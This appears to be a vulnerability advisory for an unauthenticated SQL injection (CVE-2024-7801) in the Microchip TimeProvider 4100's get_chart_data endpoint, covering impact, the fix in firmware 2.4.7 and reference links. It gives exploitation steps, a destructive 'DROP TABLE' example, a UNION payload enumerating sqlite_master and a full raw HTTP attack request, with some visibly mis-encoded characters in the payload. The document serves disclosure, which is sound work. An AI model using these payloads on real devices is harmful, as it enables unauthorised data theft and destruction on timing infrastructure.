 |
| TimeProvider 4100 Grandmaster Device |
More critically, the channelId parameter is used to dynamically specify the table name in the SQL FROM clause. This design flaw allows unauthenticated attackers to manipulate the query structure, leading to arbitrary SQL execution on the device.
Successful exploitation could allow a threat actor to:
Extract sensitive internal data
Enumerate or alter database contents
Potentially affect system behavior depending on how data is used by other services
The vulnerability can be exploited remotely and without authentication, significantly increasing the potential risk to exposed devices.
Exploitation Steps
An attacker could exploit this vulnerability using the following approach:
Send a crafted HTTP request to the vulnerable get_chart_data web endpoint.
Manipulate the channelId parameter to inject SQL syntax that alters the intended query logic.
Example: Supplying a payload such as channelId=temperature_data; DROP TABLE logs;-- may result in destructive behavior depending on backend protections.
Receive response data containing unintended results or confirmation of executed SQL commands.
An example of a malicious SQL payload is provided below:
SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--Request RAW:
POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=
1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1
# EndConclusion:
This vulnerability highlights the risks of dynamic query construction without proper input validation. The fact that the flaw is unauthenticated and affects a core web resource significantly elevates the impact and exploitability.
Reporting Information:
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection